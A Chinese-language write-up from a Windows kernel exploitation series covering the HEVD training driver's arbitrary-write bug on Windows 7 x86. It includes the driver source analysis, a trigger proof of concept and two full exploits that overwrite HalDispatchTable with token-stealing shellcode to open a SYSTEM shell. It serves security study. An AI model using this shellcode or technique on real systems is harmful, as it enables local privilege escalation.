Windows Kernel Exploitation Notes(二)——HEVD Write-What-Where

简介: 环境配置及基础知识见上一篇,本篇及后续篇章不不再赘述。

环境配置及基础知识见上一篇,本篇及后续篇章不不再赘述。本篇使用环境如下:

物理机OS:Windows 10 20H2 x64物理机WinDbg:10.0.19041.685虚拟机OS:Windows 7 SP1 x86(6.1.7601.17514)VMware:VMware Workstation 15 ProVisual Studio 2019

0x01 Root Cause Analyses

触发漏洞源码如下:

NTSTATUSTriggerArbitraryWrite(    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere){    PULONG_PTR What = NULL;    PULONG_PTR Where = NULL;    NTSTATUS Status = STATUS_SUCCESS;    PAGED_CODE();    __try    {        //        // Verify if the buffer resides in user mode        //        ProbeForRead((PVOID)UserWriteWhatWhere, sizeof(WRITE_WHAT_WHERE), (ULONG)__alignof(UCHAR));        What = UserWriteWhatWhere->What;        Where = UserWriteWhatWhere->Where;        DbgPrint("[+] UserWriteWhatWhere: 0x%p\n", UserWriteWhatWhere);        DbgPrint("[+] WRITE_WHAT_WHERE Size: 0x%X\n", sizeof(WRITE_WHAT_WHERE));        DbgPrint("[+] UserWriteWhatWhere->What: 0x%p\n", What);        DbgPrint("[+] UserWriteWhatWhere->Where: 0x%p\n", Where);#ifdef SECURE        //        // Secure Note: This is secure because the developer is properly validating if address        // pointed by 'Where' and 'What' value resides in User mode by calling ProbeForRead()/        // ProbeForWrite() routine before performing the write operation        //        ProbeForRead((PVOID)What, sizeof(PULONG_PTR), (ULONG)__alignof(UCHAR));        ProbeForWrite((PVOID)Where, sizeof(PULONG_PTR), (ULONG)__alignof(UCHAR));        *(Where) = *(What);#else        DbgPrint("[+] Triggering Arbitrary Write\n");        //        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability        // because the developer is writing the value pointed by 'What' to memory location        // pointed by 'Where' without properly validating if the values pointed by 'Where'        // and 'What' resides in User mode        //        *(Where) = *(What);#endif    }    __except (EXCEPTION_EXECUTE_HANDLER)    {        Status = GetExceptionCode();        DbgPrint("[-] Exception Code: 0x%X\n", Status);    }    //    // There is one more hidden vulnerability. Find it out.    //    return Status;}

对比Vulnerable版本与Secure版本可以发现,其在执行*(Where) = *(What)语句之前未通过ProbeForRead/ProbeForWrite函数校验读取及写入地址的合法性。跟进ProbeForRead函数:

图1

首先是校验边界,其次校验地址是否处于用户空间范围内(nt!MmUserProbeAddress其值由MiInitializeBootDefaults函数初始化):

图2

边界未对齐,触发STATUS_DATATYPE_MISALIGNMENT异常:

图3

越界则触发STATUS_ACCESS_VIOLATION异常:

图4

ProbeForWrite函数在边界对齐及地址范围校验方面与ProbeForRead类似,除此之外该函数会校验地址是否可写,可读,可访问:

图5

编写POC如下:

#include <stdio.h>#include <windows.h>#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)#define HEVD_IOCTL_ARBITRARY_WRITE                               IOCTL(0x802)typedef struct _WRITE_WHAT_WHERE{    PULONG_PTR What;    PULONG_PTR Where;} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;int main(){    HANDLE dev = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, NULL, NULL);    if (dev == INVALID_HANDLE_VALUE)    {        printf("Failed!\n");        system("pause");        return -1;    }    printf("Done! Device Handle:0x%p\n", dev);    PWRITE_WHAT_WHERE Buffer;    Buffer = (WRITE_WHAT_WHERE*)malloc(sizeof(WRITE_WHAT_WHERE));    ZeroMemory(Buffer, sizeof(WRITE_WHAT_WHERE));    Buffer->Where=(PULONG_PTR)0x41414141;    Buffer->What = (PULONG_PTR)0x42424242;    DWORD size_returned = 0;    BOOL is_ok = DeviceIoControl(dev, HEVD_IOCTL_ARBITRARY_WRITE, Buffer, sizeof(WRITE_WHAT_WHERE), NULL, 0, &size_returned, NULL);    CloseHandle(dev);    system("pause");    return 0;}

触发漏洞:

图6

0x02 Exploit

根据上文分析,现已可以实现任意地址写。将nt!HalDispatchTable中函数地址覆盖为Shellcode地址可以实现任意代码执行,具体见下文分析。

nt!HalDispatchTableHalQuerySystemInformationHalSetSystemInformation是在内核初始化过程中确定的:

图7

二者分别可以通过NtQueryIntervalProfileNtSetIntervalProfile函数调用:

图8图9

下面分别来介绍如何按上图执行流来执行至目标函数。NtQueryIntervalProfile函数定义如下:

NTSTATUS NtQueryIntervalProfile (    KPROFILE_SOURCE ProfileSource,     ULONG *Interval);

其中KPROFILE_SOURCE是一枚举类型:

typedef enum _KPROFILE_SOURCE {    ProfileTime,    ProfileAlignmentFixup,    ProfileTotalIssues,    ProfilePipelineDry,    ProfileLoadInstructions,    ProfilePipelineFrozen,    ProfileBranchInstructions,    ProfileTotalNonissues,    ProfileDcacheMisses,    ProfileIcacheMisses,    ProfileCacheMisses,    ProfileBranchMispredictions,    ProfileStoreInstructions,    ProfileFpInstructions,    ProfileIntegerInstructions,    Profile2Issue,    Profile3Issue,    Profile4Issue,    ProfileSpecialInstructions,    ProfileTotalCycles,    ProfileIcacheIssues,    ProfileDcacheAccesses,    ProfileMemoryBarrierCycles,    ProfileLoadLinkedIssues,    ProfileMaximum} KPROFILE_SOURCE, *PKPROFILE_SOURCE;

NtQueryIntervalProfile首先校验_KTHREADPreviousMode(Offset 0x13A)字段值(关于_KPCR_KPRCB_KTHREAD上一篇有介绍):

图10

其次判断参数Interval指向地址是否超过MmUserProbeAddress

图11

最后判断ProfileSource是否为零,非零值则调用KeQueryIntervalProfile

图12

KeQueryIntervalProfile会判断ProfileSource是否为1,不为1才会继续调用nt!HalDispatchTable+0x4

图13

如此,笔者构造Exploit中对该函数调用如下:

PNtQueryIntervalProfile NtQueryIntervalProfile = (PNtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");    if (!NtQueryIntervalProfile) {        cout << "[!] Failed to Get the Address of NtQueryIntervalProfile." << endl;        cout << "[!] Last error " << GetLastError() << endl;        exit(1);    }    NtQueryIntervalProfile(ProfileTotalIssues, (ULONG*)SC);        //SC——>Shellcode Address

nt!HalDispatchTable+0x4函数调用不止KeQueryIntervalProfile一处,所以在Shellcode中需要将其替换成原数值,通过其与HalSetSystemInformation函数地址相差0x912来进行恢复:

INT32 KrBase = GetKernelBaseAddress();    INT32 HalDispatchTable_Address = KrBase + 0x0012b3f8;    INT32 HalQuerySystemInformation_Address = HalDispatchTable_Address + 0x4;    INT32 HalSetSystemInformation_Address = HalDispatchTable_Address + 0x8;     //HalQuerySystemInformation_Address Offset 0x14    CHAR* SC = (CHAR*)VirtualAlloc(0, 0x60, 0x3000, 0x40);    ZeroMemory(SC, 0x60);    __asm {        pushad;        mov eax, HalSetSystemInformation_Address;        mov ebx, HalQuerySystemInformation_Address;        mov edi, SC;        mov[edi], 0x60;        mov dword ptr[edi + 0x1], 0x000000E8;        mov dword ptr[edi + 0x5], 0x588B5800;        mov dword ptr[edi + 0x9], 0x4F488B4B;        mov dword ptr[edi + 0xD], 0xEA81138B;        mov dword ptr[edi + 0x11], 0x00000912;        mov dword ptr[edi + 0x15], 0x90901189;        mov dword ptr[edi + 0x19], 0x8B64C031;        mov dword ptr[edi + 0x1D], 0x00012480;        mov dword ptr[edi + 0x21], 0x50408B00;        mov dword ptr[edi + 0x25], 0x04BAC189;        mov dword ptr[edi + 0x29], 0x8B000000;        mov dword ptr[edi + 0x2D], 0x0000B880;        mov dword ptr[edi + 0x31], 0x00B82D00;        mov dword ptr[edi + 0x35], 0x90390000;        mov dword ptr[edi + 0x39], 0x000000B4;        mov dword ptr[edi + 0x3D], 0x908BED75;        mov dword ptr[edi + 0x41], 0x000000F8;        mov dword ptr[edi + 0x45], 0x00F89189;        mov dword ptr[edi + 0x49], 0x31610000;        mov dword ptr[edi + 0x4D], 0x0000C3C0;        mov dword ptr[edi + 0x51], eax;        mov dword ptr[edi + 0x55], ebx;        popad;    }

Shellcode如下:

图14

NtSetIntervalProfile函数定义如下:

NTSTATUS NtSetIntervalProfile (    ULONG Interval,     KPROFILE_SOURCE ProfileSource);

其对参数判断位于KeSetIntervalProfile函数内,首先校验nt!PerfGlobalGroupMask+0x4

图15

其次判断ProfileSource是否为0及是否为1:

图16

上述两种方式思想相同,只是具体实现方式略有不同,两种方式完整Exploit如下:

//HalSetSystemInformation#include <iostream>#include <string.h>#include <Windows.h>using namespace std;#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)#define HEVD_IOCTL_ARBITRARY_WRITE                               IOCTL(0x802)typedef struct SYSTEM_MODULE {    ULONG                Reserved1;    ULONG                Reserved2;    PVOID                ImageBaseAddress;    ULONG                ImageSize;    ULONG                Flags;    WORD                 Id;    WORD                 Rank;    WORD                 LoadCount;    WORD                 NameOffset;    CHAR                 Name[256];}SYSTEM_MODULE, * PSYSTEM_MODULE;typedef struct SYSTEM_MODULE_INFORMATION{    ULONG                ModulesCount;    SYSTEM_MODULE        Modules[1];} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;typedef enum _SYSTEM_INFORMATION_CLASS{    SystemModuleInformation = 0xB} SYSTEM_INFORMATION_CLASS;typedef struct _WRITE_WHAT_WHERE{    PULONG_PTR What;    PULONG_PTR Where;} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;typedef enum _KPROFILE_SOURCE {    ProfileTime,    ProfileAlignmentFixup,    ProfileTotalIssues,    ProfilePipelineDry,    ProfileLoadInstructions,    ProfilePipelineFrozen,    ProfileBranchInstructions,    ProfileTotalNonissues,    ProfileDcacheMisses,    ProfileIcacheMisses,    ProfileCacheMisses,    ProfileBranchMispredictions,    ProfileStoreInstructions,    ProfileFpInstructions,    ProfileIntegerInstructions,    Profile2Issue,    Profile3Issue,    Profile4Issue,    ProfileSpecialInstructions,    ProfileTotalCycles,    ProfileIcacheIssues,    ProfileDcacheAccesses,    ProfileMemoryBarrierCycles,    ProfileLoadLinkedIssues,    ProfileMaximum} KPROFILE_SOURCE, * PKPROFILE_SOURCE;typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,    __inout PVOID SystemInformation,    __in ULONG SystemInformationLength,    __out_opt PULONG ReturnLength    );typedef NTSTATUS(WINAPI* PNtQueryIntervalProfile)(    __in KPROFILE_SOURCE ProfileSource,    __in ULONG* Interval);typedef NTSTATUS(WINAPI* PNtSetIntervalProfile)(    __in ULONG* Interval,    __in KPROFILE_SOURCE ProfileSource);INT32 GetKernelBaseAddress(){    //Get NtQuerySystemInformation Address    PNtQuerySystemInformation NtQuerySystemInformation =(PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),"NtQuerySystemInformation");    if (!NtQuerySystemInformation){        cout << "[!] Failed to Get the Address of NtQuerySystemInformation." << endl;        cout << "[!] Last Error:" << GetLastError() << endl;        exit(1);    }    ULONG len = 0;    //Get Buffer Length    NtQuerySystemInformation(SystemModuleInformation,NULL,0,&len);    //Allocate Memory    PSYSTEM_MODULE_INFORMATION PModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL,len,MEM_RESERVE | MEM_COMMIT,PAGE_EXECUTE_READWRITE);    //Get SYSTEM_MODULE_INFORMATION     NTSTATUS Status = NtQuerySystemInformation(SystemModuleInformation,PModuleInfo,len,&len);    if (Status != (NTSTATUS)0x0){        cout << "[!] NtQuerySystemInformation Failed!" << endl;        exit(1);    }    PVOID KernelImageBase = PModuleInfo->Modules[0].ImageBaseAddress;    cout << "[>] Kernel base address: 0x" << hex << KernelImageBase << endl;    return (INT32)KernelImageBase;}int main() {    HANDLE hFile = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, NULL, NULL);    if (hFile == INVALID_HANDLE_VALUE) {        cout << "[!] No Handle to HackSysExtremeVulnerableDriver" << endl;        exit(1);    }    cout << "[>] Handle to HackSysExtremeVulnerableDriver: 0x" << hex << (INT32)hFile << endl;    INT32 KrBase = GetKernelBaseAddress();    INT32 HalDispatchTable_Address = KrBase + 0x0012b3f8;    INT32 HalQuerySystemInformation_Address = HalDispatchTable_Address + 0x4;    INT32 HalSetSystemInformation_Address = HalDispatchTable_Address + 0x8;     //HalQuerySystemInformation_Address Offset 0x912    CHAR* SC = (CHAR*)VirtualAlloc(0, 0x60, 0x3000, 0x40);    ZeroMemory(SC, 0x60);    __asm {        pushad;        mov ebx, HalSetSystemInformation_Address;        mov eax, HalQuerySystemInformation_Address;        mov edi, SC;        mov[edi], 0x60;        mov dword ptr[edi + 0x1], 0x000000E8;        mov dword ptr[edi + 0x5], 0x588B5800;        mov dword ptr[edi + 0x9], 0x4F488B4B;        mov dword ptr[edi + 0xD], 0xC281138B;        mov dword ptr[edi + 0x11], 0x00000912;        mov dword ptr[edi + 0x15], 0x90901189;        mov dword ptr[edi + 0x19], 0x8B64C031;        mov dword ptr[edi + 0x1D], 0x00012480;        mov dword ptr[edi + 0x21], 0x50408B00;        mov dword ptr[edi + 0x25], 0x04BAC189;        mov dword ptr[edi + 0x29], 0x8B000000;        mov dword ptr[edi + 0x2D], 0x0000B880;        mov dword ptr[edi + 0x31], 0x00B82D00;        mov dword ptr[edi + 0x35], 0x90390000;        mov dword ptr[edi + 0x39], 0x000000B4;        mov dword ptr[edi + 0x3D], 0x908BED75;        mov dword ptr[edi + 0x41], 0x000000F8;        mov dword ptr[edi + 0x45], 0x00F89189;        mov dword ptr[edi + 0x49], 0x31610000;        mov dword ptr[edi + 0x4D], 0x0000C3C0;        mov dword ptr[edi + 0x51], eax;        mov dword ptr[edi + 0x55], ebx;        popad;    }    PULONG_PTR* PShellcode = (PULONG_PTR*)&SC;    PWRITE_WHAT_WHERE Buffer;    Buffer = (WRITE_WHAT_WHERE*)malloc(sizeof(WRITE_WHAT_WHERE));    ZeroMemory(Buffer, sizeof(WRITE_WHAT_WHERE));    Buffer->Where = (PULONG_PTR)HalSetSystemInformation_Address;    Buffer->What = (PULONG_PTR)PShellcode;    DWORD size_returned = 0;    BOOL is_ok = DeviceIoControl(hFile, HEVD_IOCTL_ARBITRARY_WRITE, Buffer, sizeof(WRITE_WHAT_WHERE), NULL, 0, &size_returned, NULL);    PNtSetIntervalProfile NtSetIntervalProfile = (PNtSetIntervalProfile)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetIntervalProfile");    if (!NtSetIntervalProfile) {        cout << "[!] Failed to Get the Address of NtSetIntervalProfile." << endl;        cout << "[!] Last error " << GetLastError() << endl;        exit(1);    }    NtSetIntervalProfile((ULONG*)SC, ProfileTotalIssues);    PROCESS_INFORMATION ProcessInformation;    ZeroMemory(&ProcessInformation, sizeof(ProcessInformation));    STARTUPINFOA StartupInfo;    ZeroMemory(&StartupInfo, sizeof(StartupInfo));    CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &StartupInfo, &ProcessInformation);    VirtualFree(SC, 0, MEM_RELEASE);}

//HalQuerySystemInformation#include <iostream>#include <string.h>#include <Windows.h>using namespace std;#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)#define HEVD_IOCTL_ARBITRARY_WRITE                               IOCTL(0x802)typedef struct SYSTEM_MODULE {    ULONG                Reserved1;    ULONG                Reserved2;    PVOID                ImageBaseAddress;    ULONG                ImageSize;    ULONG                Flags;    WORD                 Id;    WORD                 Rank;    WORD                 LoadCount;    WORD                 NameOffset;    CHAR                 Name[256];}SYSTEM_MODULE, * PSYSTEM_MODULE;typedef struct SYSTEM_MODULE_INFORMATION{    ULONG                ModulesCount;    SYSTEM_MODULE        Modules[1];} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;typedef enum _SYSTEM_INFORMATION_CLASS{    SystemModuleInformation = 0xB} SYSTEM_INFORMATION_CLASS;typedef struct _WRITE_WHAT_WHERE{    PULONG_PTR What;    PULONG_PTR Where;} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;typedef enum _KPROFILE_SOURCE {    ProfileTime,    ProfileAlignmentFixup,    ProfileTotalIssues,    ProfilePipelineDry,    ProfileLoadInstructions,    ProfilePipelineFrozen,    ProfileBranchInstructions,    ProfileTotalNonissues,    ProfileDcacheMisses,    ProfileIcacheMisses,    ProfileCacheMisses,    ProfileBranchMispredictions,    ProfileStoreInstructions,    ProfileFpInstructions,    ProfileIntegerInstructions,    Profile2Issue,    Profile3Issue,    Profile4Issue,    ProfileSpecialInstructions,    ProfileTotalCycles,    ProfileIcacheIssues,    ProfileDcacheAccesses,    ProfileMemoryBarrierCycles,    ProfileLoadLinkedIssues,    ProfileMaximum} KPROFILE_SOURCE, * PKPROFILE_SOURCE;typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,    __inout PVOID SystemInformation,    __in ULONG SystemInformationLength,    __out_opt PULONG ReturnLength    );typedef NTSTATUS(WINAPI* PNtQueryIntervalProfile)(    __in KPROFILE_SOURCE ProfileSource,    __in ULONG* Interval);typedef NTSTATUS(WINAPI* PNtSetIntervalProfile)(    __in ULONG* Interval,    __in KPROFILE_SOURCE ProfileSource);INT32 GetKernelBaseAddress(){    //Get NtQuerySystemInformation Address    PNtQuerySystemInformation NtQuerySystemInformation =(PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),"NtQuerySystemInformation");    if (!NtQuerySystemInformation){        cout << "[!] Failed to Get the Address of NtQuerySystemInformation." << endl;        cout << "[!] Last Error:" << GetLastError() << endl;        exit(1);    }    ULONG len = 0;    //Get Buffer Length    NtQuerySystemInformation(SystemModuleInformation,NULL,0,&len);    //Allocate Memory    PSYSTEM_MODULE_INFORMATION PModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL,len,MEM_RESERVE | MEM_COMMIT,PAGE_EXECUTE_READWRITE);    //Get SYSTEM_MODULE_INFORMATION     NTSTATUS Status = NtQuerySystemInformation(SystemModuleInformation,PModuleInfo,len,&len);    if (Status != (NTSTATUS)0x0){        cout << "[!] NtQuerySystemInformation Failed!" << endl;        exit(1);    }    PVOID KernelImageBase = PModuleInfo->Modules[0].ImageBaseAddress;    cout << "[>] Kernel base address: 0x" << hex << KernelImageBase << endl;    return (INT32)KernelImageBase;}int main() {    HANDLE hFile = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, NULL, NULL);    if (hFile == INVALID_HANDLE_VALUE) {        cout << "[!] No Handle to HackSysExtremeVulnerableDriver" << endl;        exit(1);    }    cout << "[>] Handle to HackSysExtremeVulnerableDriver: 0x" << hex << (INT32)hFile << endl;    INT32 KrBase = GetKernelBaseAddress();    INT32 HalDispatchTable_Address = KrBase + 0x0012b3f8;    INT32 HalQuerySystemInformation_Address = HalDispatchTable_Address + 0x4;    INT32 HalSetSystemInformation_Address = HalDispatchTable_Address + 0x8;     //HalQuerySystemInformation_Address Offset 0x912    CHAR* SC = (CHAR*)VirtualAlloc(0, 0x60, 0x3000, 0x40);    ZeroMemory(SC, 0x60);    __asm {        pushad;        mov eax, HalSetSystemInformation_Address;        mov ebx, HalQuerySystemInformation_Address;        mov edi, SC;        mov[edi], 0x60;        mov dword ptr[edi + 0x1], 0x000000E8;        mov dword ptr[edi + 0x5], 0x588B5800;        mov dword ptr[edi + 0x9], 0x4F488B4B;        mov dword ptr[edi + 0xD], 0xEA81138B;        mov dword ptr[edi + 0x11], 0x00000912;        mov dword ptr[edi + 0x15], 0x90901189;        mov dword ptr[edi + 0x19], 0x8B64C031;        mov dword ptr[edi + 0x1D], 0x00012480;        mov dword ptr[edi + 0x21], 0x50408B00;        mov dword ptr[edi + 0x25], 0x04BAC189;        mov dword ptr[edi + 0x29], 0x8B000000;        mov dword ptr[edi + 0x2D], 0x0000B880;        mov dword ptr[edi + 0x31], 0x00B82D00;        mov dword ptr[edi + 0x35], 0x90390000;        mov dword ptr[edi + 0x39], 0x000000B4;        mov dword ptr[edi + 0x3D], 0x908BED75;        mov dword ptr[edi + 0x41], 0x000000F8;        mov dword ptr[edi + 0x45], 0x00F89189;        mov dword ptr[edi + 0x49], 0x31610000;        mov dword ptr[edi + 0x4D], 0x0000C3C0;        mov dword ptr[edi + 0x51], eax;        mov dword ptr[edi + 0x55], ebx;        popad;    }    PULONG_PTR* PShellcode = (PULONG_PTR*)&SC;    PWRITE_WHAT_WHERE Buffer;    Buffer = (WRITE_WHAT_WHERE*)malloc(sizeof(WRITE_WHAT_WHERE));    ZeroMemory(Buffer, sizeof(WRITE_WHAT_WHERE));    Buffer->Where = (PULONG_PTR)HalQuerySystemInformation_Address;    Buffer->What = (PULONG_PTR)PShellcode;    DWORD size_returned = 0;    BOOL is_ok = DeviceIoControl(hFile, HEVD_IOCTL_ARBITRARY_WRITE, Buffer, sizeof(WRITE_WHAT_WHERE), NULL, 0, &size_returned, NULL);    PNtQueryIntervalProfile NtQueryIntervalProfile = (PNtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");    if (!NtQueryIntervalProfile) {        cout << "[!] Failed to Get the Address of NtQueryIntervalProfile." << endl;        cout << "[!] Last error " << GetLastError() << endl;        exit(1);    }    NtQueryIntervalProfile(ProfileTotalIssues, (ULONG*)SC);    PROCESS_INFORMATION ProcessInformation;    ZeroMemory(&ProcessInformation, sizeof(ProcessInformation));    STARTUPINFOA StartupInfo;    ZeroMemory(&StartupInfo, sizeof(StartupInfo));    CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &StartupInfo, &ProcessInformation);    VirtualFree(SC, 0, MEM_RELEASE);}

效果如下:

相关文章
|
存储 安全 虚拟化
Windows Kernel Exploitation Notes(一)——HEVD Stack Overflow
1.Download OSR Loader 3.0:[OSROnline]http://www.osronline.com/OsrDown.cfm/osrloaderv30.zip?name=osrloaderv30.zip&id=1572.Download HEVD Source Code & HEVD_3.0:[Github]https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/releases/tag/v3.00
|
安全 Linux 调度
【windows kernel源码分析】对初学者友好的底层理解,让你对计算机内核不再迷茫
【windows kernel源码分析】对初学者友好的底层理解,让你对计算机内核不再迷茫
199 0
【windows kernel源码分析】对初学者友好的底层理解,让你对计算机内核不再迷茫
|
Shell 开发工具 git
Git for Windows v2.8.3 Release Notes
Git for Windows v2.8.3 Release Notes Latest update: May 20th 2016 Introduction These release notes describe issues specific to the Git for Windows release. The release notes covering the
3576 0
|
开发工具 Windows
Microsoft Windows CE 5.0 Board Support Package, Boot Loader, and Kernel Startup Sequence
Mark PlaggeMicrosoft Corporation May 2004 Applies To:     Microsoft® Windows® CE 5.
1119 0
|
1月前
|
网络安全 Windows
Windows server 2012R2系统安装远程桌面服务后无法多用户同时登录是什么原因?
【11月更文挑战第15天】本文介绍了在Windows Server 2012 R2中遇到的多用户无法同时登录远程桌面的问题及其解决方法,包括许可模式限制、组策略配置问题、远程桌面服务配置错误以及网络和防火墙问题四个方面的原因分析及对应的解决方案。